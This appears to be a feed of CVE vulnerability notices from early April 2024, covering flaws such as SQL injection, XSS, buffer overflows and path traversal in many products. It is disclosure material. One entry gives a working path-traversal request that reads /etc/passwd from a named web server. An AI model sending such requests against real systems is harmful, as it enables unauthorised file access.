🚨 CVE-2023-52535In vsp driver, there is a possible missing verification incorrect input. This could lead to local denial of service with no additional execution privileges needed🎖@cveNotify |
|
| 2024-04-08 03:37:40 |
🚨 CVE-2023-52352In Network Adapter Service, there is a possible missing permission check. This could lead to local denial of service with no additional execution privileges needed🎖@cveNotify |
|
| 2024-04-08 03:37:39 |
🚨 CVE-2023-52351In ril service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed🎖@cveNotify |
|
| 2024-04-08 03:37:35 |
🚨 CVE-2023-52348In ril service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed🎖@cveNotify |
|
| 2024-04-08 03:37:34 |
🚨 CVE-2023-52346In modem driver, there is a possible system crash due to improper input validation. This could lead to local information disclosure with System execution privileges needed🎖@cveNotify |
|
| 2024-04-08 03:37:30 |
🚨 CVE-2023-52344In modem-ps-nas-ngmm, there is a possible undefined behavior due to incorrect error handling. This could lead to remote information disclosure no additional execution privileges needed🎖@cveNotify |
|
| 2024-04-08 03:37:29 |
🚨 CVE-2023-52342In modem-ps-nas-ngmm, there is a possible undefined behavior due to incorrect error handling. This could lead to remote information disclosure no additional execution privileges needed🎖@cveNotify |
|
| 2024-04-08 03:37:28 |
🚨 CVE-2023-52341In Plaintext COUNTER CHECK message accepted before AS security activation, there is a possible missing permission check. This could lead to remote information disclosure no additional execution privileges needed🎖@cveNotify |
|
| 2024-04-08 02:07:25 |
🚨 CVE-2024-29748there is a possible way to bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-04-08 02:07:24 |
🚨 CVE-2024-29745there is a possible Information Disclosure due to uninitialized data. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-04-08 01:37:24 |
🚨 CVE-2024-28744The password is empty in the initial configuration of ACERA 9010-08 firmware v02.04 and earlier, and ACERA 9010-24 firmware v02.04 and earlier. An unauthenticated attacker may log in to the product with no password, and obtain and/or alter information such as network configuration and user information. The products are affected only when running in non MS mode with the initial configuration.🎖@cveNotify |
|
| 2024-04-08 00:37:32 |
🚨 CVE-2024-3437A vulnerability was found in SourceCodester Prison Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /Admin/add-admin.php of the component Avatar Handler. The manipulation of the argument avatar leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259631.🎖@cveNotify |
|
| 2024-04-08 00:37:28 |
🚨 CVE-2024-3434A vulnerability classified as critical was found in CP Plus Wi-Fi Camera up to 20240401. Affected by this vulnerability is an unknown functionality of the component User Management. The manipulation leads to improper authorization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259615. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-08 00:37:27 |
🚨 CVE-2024-31498Yubico ykman-gui (aka YubiKey Manager GUI) before 1.2.6 on Windows, when Edge is not used, allows privilege escalation because browser windows can open as Administrator.🎖@cveNotify |
|
| 2024-04-07 23:37:25 |
🚨 CVE-2024-3433A vulnerability classified as problematic has been found in PuneethReddyHC Event Management 1.0. Affected is an unknown function of the file /backend/register.php. The manipulation of the argument event_id/full_name/email/mobile/college/branch leads to cross site scripting. It is possible to launch the attack remotely. VDB-259614 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-07 23:37:24 |
🚨 CVE-2024-3432A vulnerability was found in PuneethReddyHC Event Management 1.0. It has been rated as critical. This issue affects some unknown processing of the file /backend/register.php. The manipulation of the argument event_id/full_name/email/mobile/college/branch leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259613 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-07 22:37:24 |
🚨 CVE-2024-3430A vulnerability was found in QKSMS up to 3.9.4 on Android. It has been classified as problematic. This affects an unknown part of the file androidmanifest.xml of the component Backup File Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259611. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-07 21:37:26 |
🚨 CVE-2024-31951In the Opaque LSA Extended Link parser in FRRouting (FRR) through 9.1, there can be a buffer overflow and daemon crash in ospf_te_parse_ext_link for OSPF LSA packets during an attempt to read Segment Routing Adjacency SID subTLVs (lengths are not validated).🎖@cveNotify |
|
| 2024-04-07 21:37:25 |
🚨 CVE-2024-31949In FRRouting (FRR) through 9.1, an infinite loop can occur when receiving a MP/GR capability as a dynamic capability because malformed data results in a pointer not advancing.🎖@cveNotify |
|
| 2024-04-07 21:37:24 |
🚨 CVE-2024-31948In FRRouting (FRR) through 9.1, an attacker using a malformed Prefix SID attribute in a BGP UPDATE packet can cause the bgpd daemon to crash.🎖@cveNotify |
|
| 2024-04-07 18:37:41 |
🚨 CVE-2024-31344Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Phpbits Creative Studio Easy Login Styler – White Label Admin Login Page for WordPress allows Stored XSS.This issue affects Easy Login Styler – White Label Admin Login Page for WordPress: from n/a through 1.0.6.🎖@cveNotify |
|
| 2024-04-07 18:37:40 |
🚨 CVE-2024-31296Authorization Bypass Through User-Controlled Key vulnerability in Repute Infosystems BookingPress.This issue affects BookingPress: from n/a through 1.0.81.🎖@cveNotify |
|
| 2024-04-07 18:37:39 |
🚨 CVE-2024-31292Unrestricted Upload of File with Dangerous Type vulnerability in Moove Agency Import XML and RSS Feeds.This issue affects Import XML and RSS Feeds: from n/a through 2.1.5.🎖@cveNotify |
|
| 2024-04-07 18:37:36 |
🚨 CVE-2024-31288Server-Side Request Forgery (SSRF) vulnerability in RapidLoad RapidLoad Power-Up for Autoptimize.This issue affects RapidLoad Power-Up for Autoptimize: from n/a through 2.2.11.🎖@cveNotify |
|
| 2024-04-07 18:37:35 |
🚨 CVE-2024-31280Unrestricted Upload of File with Dangerous Type vulnerability in Andy Moyle Church Admin.This issue affects Church Admin: from n/a through 4.1.5.🎖@cveNotify |
|
| 2024-04-07 18:37:34 |
🚨 CVE-2024-31277Deserialization of Untrusted Data vulnerability in PickPlugins Product Designer.This issue affects Product Designer: from n/a through 1.0.32.🎖@cveNotify |
|
| 2024-04-07 18:37:31 |
🚨 CVE-2024-31258Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Micro.Company Form to Chat App allows Stored XSS.This issue affects Form to Chat App: from n/a through 1.1.6.🎖@cveNotify |
|
| 2024-04-07 18:37:30 |
🚨 CVE-2024-31256Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebinarPress allows Reflected XSS.This issue affects WebinarPress: from n/a through 1.33.9.🎖@cveNotify |
|
| 2024-04-07 18:37:29 |
🚨 CVE-2024-31255Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ELEXtensions ELEX WooCommerce Dynamic Pricing and Discounts allows Reflected XSS.This issue affects ELEX WooCommerce Dynamic Pricing and Discounts: from n/a through 2.1.2.🎖@cveNotify |
|
| 2024-04-07 18:37:26 |
🚨 CVE-2024-31241Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ThimPress LearnPress Export Import.This issue affects LearnPress Export Import: from n/a through 4.0.3.🎖@cveNotify |
|
| 2024-04-07 18:37:25 |
🚨 CVE-2024-31233Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Sizam Rehub.This issue affects Rehub: from n/a through 19.6.1.🎖@cveNotify |
|
| 2024-04-07 18:37:24 |
🚨 CVE-2024-22155Cross-Site Request Forgery (CSRF) vulnerability in Automattic WooCommerce.This issue affects WooCommerce: from n/a through 8.5.2.🎖@cveNotify |
|
| 2024-04-07 17:37:25 |
🚨 CVE-2024-3427A vulnerability, which was classified as problematic, was found in SourceCodester Online Courseware 1.0. This affects an unknown part of the file addq.php. The manipulation of the argument id leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259599.🎖@cveNotify |
|
| 2024-04-07 17:37:24 |
🚨 CVE-2024-3426A vulnerability, which was classified as problematic, has been found in SourceCodester Online Courseware 1.0. Affected by this issue is some unknown functionality of the file editt.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259598 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-07 16:37:25 |
🚨 CVE-2024-3425A vulnerability classified as critical was found in SourceCodester Online Courseware 1.0. Affected by this vulnerability is an unknown functionality of the file admin/activateall.php. The manipulation of the argument selector leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259597 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-07 16:37:24 |
🚨 CVE-2024-3424A vulnerability classified as critical has been found in SourceCodester Online Courseware 1.0. Affected is an unknown function of the file admin/listscore.php. The manipulation of the argument title leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259596.🎖@cveNotify |
|
| 2024-04-07 15:37:24 |
🚨 CVE-2024-3423A vulnerability was found in SourceCodester Online Courseware 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin/activateteach.php. The manipulation of the argument selector leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259595.🎖@cveNotify |
|
| 2024-04-07 14:37:25 |
🚨 CVE-2024-3422A vulnerability was found in SourceCodester Online Courseware 1.0. It has been declared as critical. This vulnerability affects unknown code of the file admin/activatestud.php. The manipulation of the argument selector leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259594 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-07 14:37:24 |
🚨 CVE-2024-3273** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-04-07 13:37:24 |
🚨 CVE-2024-3421A vulnerability was found in SourceCodester Online Courseware 1.0. It has been classified as critical. This affects an unknown part of the file admin/deactivatestud.php. The manipulation of the argument selector leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259593 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-07 12:37:25 |
🚨 CVE-2024-28085wall in util-linux through 2.40, often installed with setgid tty permissions, allows escape sequences to be sent to other users' terminals through argv. (Specifically, escape sequences received from stdin are blocked, but escape sequences received from argv are not blocked.) There may be plausible scenarios where this leads to account takeover.🎖@cveNotify |
|
| 2024-04-07 12:37:24 |
🚨 CVE-2021-37600An integer overflow in util-linux through 2.37.1 can potentially cause a buffer overflow if an attacker were able to use system resources in a way that leads to a large number in the /proc/sysvipc/sem file. NOTE: this is unexploitable in GNU C Library environments, and possibly in all realistic environments.🎖@cveNotify |
|
| 2024-04-07 11:37:25 |
🚨 CVE-2024-3420A vulnerability was found in SourceCodester Online Courseware 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file admin/saveedit.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259592.🎖@cveNotify |
|
| 2024-04-07 10:37:25 |
🚨 CVE-2021-30499A flaw was found in libcaca. A buffer overflow of export.c in function export_troff might lead to memory corruption and other potential consequences.🎖@cveNotify |
|
| 2024-04-07 10:37:24 |
🚨 CVE-2021-30498A flaw was found in libcaca. A heap buffer overflow in export.c in function export_tga might lead to memory corruption and other potential consequences.🎖@cveNotify |
|
| 2024-04-07 09:37:32 |
🚨 CVE-2023-52716Vulnerability of starting activities in the background in the ActivityManagerService (AMS) module.Impact: Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-04-07 09:37:25 |
🚨 CVE-2023-52713Vulnerability of improper permission control in the window management module.Impact: Successful exploitation of this vulnerability will affect availability and confidentiality.🎖@cveNotify |
|
| 2024-04-07 09:37:24 |
🚨 CVE-2021-4438A vulnerability, which was classified as critical, has been found in kyivstarteam react-native-sms-user-consent up to 1.1.4 on Android. Affected by this issue is the function registerReceiver of the file android/src/main/java/ua/kyivstar/reactnativesmsuserconsent/SmsUserConsentModule.kt. The manipulation leads to improper export of android application components. Attacking locally is a requirement. Upgrading to version 1.1.5 is able to address this issue. The name of the patch is 5423dcb0cd3e4d573b5520a71fa08aa279e4c3c7. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-259508.🎖@cveNotify |
|
| 2024-04-07 08:37:25 |
🚨 CVE-2024-30414Command injection vulnerability in the AccountManager module.Impact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-04-07 08:37:24 |
🚨 CVE-2024-30413Vulnerability of improper permission control in the window management module.Impact: Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-04-07 06:37:24 |
🚨 CVE-2024-3417A vulnerability, which was classified as critical, has been found in SourceCodester Online Courseware 1.0. This issue affects some unknown processing of the file admin/saveeditt.php. The manipulation of the argument contact leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259589 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-07 04:37:25 |
🚨 CVE-2024-3416A vulnerability classified as critical was found in SourceCodester Online Courseware 1.0. This vulnerability affects unknown code of the file admin/editt.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259588.🎖@cveNotify |
|
| 2024-04-07 04:37:24 |
🚨 CVE-2024-27575INOTEC Sicherheitstechnik WebServer CPS220/64 3.3.19 allows a remote attacker to read arbitrary files via absolute path traversal, such as with the /cgi-bin/display?file=/etc/passwd URI.🎖@cveNotify |
|
| 2024-04-07 02:37:24 |
🚨 CVE-2023-6877The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.3.3 due to insufficient input sanitization and output escaping on the Content-Type field of error messages when retrieving an invalid RSS feed. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-07 01:37:25 |
🚨 CVE-2021-40812The GD Graphics Library (aka LibGD) through 2.3.2 has an out-of-bounds read because of the lack of certain gdGetBuf and gdPutBuf return value checks.🎖@cveNotify |
|
| 2024-04-07 01:37:24 |
🚨 CVE-2018-14553gdImageClone in gd.c in libgd 2.1.0-rc2 through 2.2.5 has a NULL pointer dereference allowing attackers to crash an application via a specific function call sequence. Only affects PHP when linked with an external libgd (not bundled).🎖@cveNotify |
|
| 2024-04-06 23:37:24 |
🚨 CVE-2024-3415A vulnerability was found in SourceCodester Human Resource Information System 1.0. It has been classified as problematic. Affected is an unknown function of the file Superadmin_Dashboard/process/addbranches_process.php. The manipulation of the argument branches_name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259584.🎖@cveNotify |
|
| 2024-04-06 22:37:24 |
🚨 CVE-2024-22201Jetty is a Java based web server and servlet engine. An HTTP/2 SSL connection that is established and TCP congested will be leaked when it times out. An attacker can cause many connections to end up in this state, and the server may run out of file descriptors, eventually causing the server to stop accepting new connections from valid clients. The vulnerability is patched in 9.4.54, 10.0.20, 11.0.20, and 12.0.6.🎖@cveNotify |
|
| 2024-04-06 21:37:24 |
🚨 CVE-2024-3414A vulnerability was found in SourceCodester Human Resource Information System 1.0 and classified as problematic. This issue affects some unknown processing of the file Superadmin_Dashboard/process/addcorporate_process.php. The manipulation of the argument corporate_name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259583.🎖@cveNotify |
|
| 2024-04-06 19:37:25 |
🚨 CVE-2024-3413A vulnerability has been found in SourceCodester Human Resource Information System 1.0 and classified as critical. This vulnerability affects unknown code of the file initialize/login_process.php. The manipulation of the argument hr_email/hr_password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259582 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-06 19:37:24 |
🚨 CVE-2024-27620An issue in Ladder v.0.0.1 thru v.0.0.21 allows a remote attacker to obtain sensitive information via a crafted request to the API.🎖@cveNotify |
|
| 2024-04-06 17:37:24 |
🚨 CVE-2024-0406A flaw was discovered in the mholt/archiver package. This flaw allows an attacker to create a specially crafted tar file, which, when unpacked, may allow access to restricted files or directories. This issue can allow the creation or overwriting of files with the user's or application's privileges using the library.🎖@cveNotify |
|
| 2024-04-06 16:37:25 |
🚨 CVE-2024-3204A vulnerability has been found in c-blosc2 up to 2.13.2 and classified as critical. Affected by this vulnerability is the function ndlz4_decompress of the file /src/c-blosc2/plugins/codecs/ndlz/ndlz4x4.c. The manipulation leads to heap-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.14.3 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-259051.🎖@cveNotify |
|
| 2024-04-06 16:37:24 |
🚨 CVE-2024-3203A vulnerability, which was classified as critical, was found in c-blosc2 up to 2.13.2. Affected is the function ndlz8_decompress of the file /src/c-blosc2/plugins/codecs/ndlz/ndlz8x8.c. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.14.3 is able to address this issue. It is recommended to upgrade the affected component. VDB-259050 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-06 15:37:25 |
🚨 CVE-2024-3158Use after free in Bookmarks in Google Chrome prior to 123.0.6312.105 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-04-06 15:37:24 |
🚨 CVE-2024-3156Inappropriate implementation in V8 in Google Chrome prior to 123.0.6312.105 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-04-06 13:37:26 |
🚨 CVE-2024-3378A vulnerability has been found in iboss Secure Web Gateway up to 10.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /login of the component Login Portal. The manipulation of the argument redirectUrl leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 10.2.0.160 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-259501 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-06 12:37:26 |
🚨 CVE-2024-3377A vulnerability classified as problematic was found in SourceCodester Computer Laboratory Management System 1.0. This vulnerability affects unknown code of the file /classes/SystemSettings.php?f=update_settings. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259498 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-06 12:37:25 |
🚨 CVE-2024-24746Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in Apache NimBLE. Specially crafted GATT operation can cause infinite loop in GATT server leading to denial of service in Bluetooth stack or device.This issue affects Apache NimBLE: through 1.6.0.Users are recommended to upgrade to version 1.7.0, which fixes the issue.🎖@cveNotify |
|
| 2024-04-06 12:37:24 |
🚨 CVE-2024-22328IBM Maximo Application Suite 8.10 and 8.11 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 279950.🎖@cveNotify |
|
| 2024-04-06 11:37:25 |
🚨 CVE-2024-3369A vulnerability, which was classified as critical, has been found in code-projects Car Rental 1.0. Affected by this issue is some unknown functionality of the file add-vehicle.php. The manipulation of the argument Upload Image leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259490 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-06 11:37:24 |
🚨 CVE-2024-3366A vulnerability classified as problematic was found in Xuxueli xxl-job up to 2.4.1. This vulnerability affects the function deserialize of the file com/xxl/job/core/util/JdkSerializeTool.java of the component Template Handler. The manipulation leads to injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259480.🎖@cveNotify |
|
| 2024-04-06 10:37:24 |
🚨 CVE-2024-3365A vulnerability was found in SourceCodester Online Library System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin/users/controller.php. The manipulation of the argument user_name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259469 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-06 09:37:25 |
🚨 CVE-2024-2296The Photo Gallery by 10Web – Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG file uploads in all versions up to, and including, 1.8.21 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-04-06 09:37:24 |
🚨 CVE-2024-2132The Ultimate Bootstrap Elements for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Widget in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-06 08:37:25 |
🚨 CVE-2024-2458The Powerkit – Supercharge your WordPress Site plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 2.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-06 08:37:24 |
🚨 CVE-2024-0837The Element Pack Elementor Addons (Header Footer, Free Template Library, Grid, Carousel, Table, Parallax Animation, Register Form, Twitter Grid) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image URL parameter in all versions up to, and including, 5.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-06 07:37:24 |
🚨 CVE-2024-2949The Carousel, Slider, Gallery by WP Carousel – Image Carousel & Photo Gallery, Post Carousel & Post Grid, Product Carousel & Product Grid for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the carousel widget in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-06 06:37:26 |
🚨 CVE-2024-3361A vulnerability has been found in SourceCodester Online Library System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file admin/books/deweydecimal.php. The manipulation of the argument category leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259465 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-06 06:37:25 |
🚨 CVE-2024-24549Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.🎖@cveNotify |
|
| 2024-04-06 06:37:24 |
🚨 CVE-2024-23672Denial of Service via incomplete cleanup vulnerability in Apache Tomcat. It was possible for WebSocket clients to keep WebSocket connections open leading to increased resource consumption.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.🎖@cveNotify |
|
| 2024-04-06 05:37:25 |
🚨 CVE-2024-2444The Inline Related Posts WordPress plugin before 3.5.0 does not sanitise and escape some of its settings, which could allow high privilege users such as Admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed🎖@cveNotify |
|
| 2024-04-06 05:37:24 |
🚨 CVE-2024-21506Versions of the package pymongo before 4.6.3 are vulnerable to Out-of-bounds Read in the bson module. Using the crafted payload the attacker could force the parser to deserialize unmanaged memory. The parser tries to interpret bytes next to buffer and throws an exception with string. If the following bytes are not printable UTF-8 the parser throws an exception with a single byte.🎖@cveNotify |
|
| 2024-04-06 04:37:32 |
🚨 CVE-2024-3359A vulnerability, which was classified as critical, has been found in SourceCodester Online Library System 1.0. This issue affects some unknown processing of the file admin/login.php. The manipulation of the argument user_email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259463.🎖@cveNotify |
|
| 2024-04-06 04:37:25 |
🚨 CVE-2024-2950The BoldGrid Easy SEO – Simple and Effective SEO plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.6.14 via meta information (og:description) This makes it possible for unauthenticated attackers to view the first 130 characters of a password protected post which can contain sensitive information.🎖@cveNotify |
|
| 2024-04-06 04:37:24 |
🚨 CVE-2024-1385The WP-Stateless – Google Cloud Storage plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the dismiss_notices() function in all versions up to, and including, 3.4.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary option values to the current time, which may completely take a site offline.🎖@cveNotify |
|
| 2024-04-06 03:37:24 |
🚨 CVE-2024-3209A vulnerability was found in UPX up to 4.2.2. It has been rated as critical. This issue affects the function get_ne64 of the file bele.h. The manipulation leads to heap-based buffer overflow. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259055. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-06 02:37:24 |
🚨 CVE-2024-1994The Image Watermark plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the watermark_action_ajax() function in all versions up to, and including, 1.7.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to apply and remove watermarks from images.🎖@cveNotify |
|
| 2024-04-06 01:37:24 |
🚨 CVE-2023-7152A vulnerability, which was classified as critical, has been found in MicroPython 1.21.0/1.22.0-preview. Affected by this issue is the function poll_set_add_fd of the file extmod/modselect.c. The manipulation leads to use after free. The exploit has been disclosed to the public and may be used. The patch is identified as 8b24aa36ba978eafc6114b6798b47b7bfecdca26. It is recommended to apply a patch to fix this issue. VDB-249158 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-06 01:07:24 |
🚨 CVE-2024-29745there is a possible Information Disclosure due to uninitialized data. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-04-05 22:37:24 |
🚨 CVE-2024-3357A vulnerability classified as problematic has been found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. This affects an unknown part of the file admin/mod_reports/index.php. The manipulation of the argument end leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259461 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-05 21:37:36 |
🚨 CVE-2024-3355A vulnerability was found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file admin/mod_users/controller.php?action=add. The manipulation of the argument name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259459.🎖@cveNotify |
|
| 2024-04-05 21:37:35 |
🚨 CVE-2024-27912A denial of service vulnerability was reported in some Lenovo Printers that could allow an attacker to cause the device to crash by sending crafted LPD packets.🎖@cveNotify |
|
| 2024-04-05 21:37:31 |
🚨 CVE-2024-27911A vulnerability was reported in some Lenovo Printers that could allow an unauthenticated attacker to obtain the administrator password.🎖@cveNotify |
|
| 2024-04-05 21:37:30 |
🚨 CVE-2024-23592An authentication bypass vulnerability was reported in Lenovo devices with Synaptics fingerprint readers that could allow an attacker with physical access to replay fingerprints and bypass Windows Hello authentication.🎖@cveNotify |
|
| 2024-04-05 21:37:25 |
🚨 CVE-2023-25494A potential vulnerability were reported in the BIOS of some Desktop, Smart Edge, and ThinkStation products that could allow a local attacker with elevated privileges to write to NVRAM variables.🎖@cveNotify |
|
| 2024-04-05 21:37:24 |
🚨 CVE-2024-2280The Better Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the widget link URL values in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-05 20:37:32 |
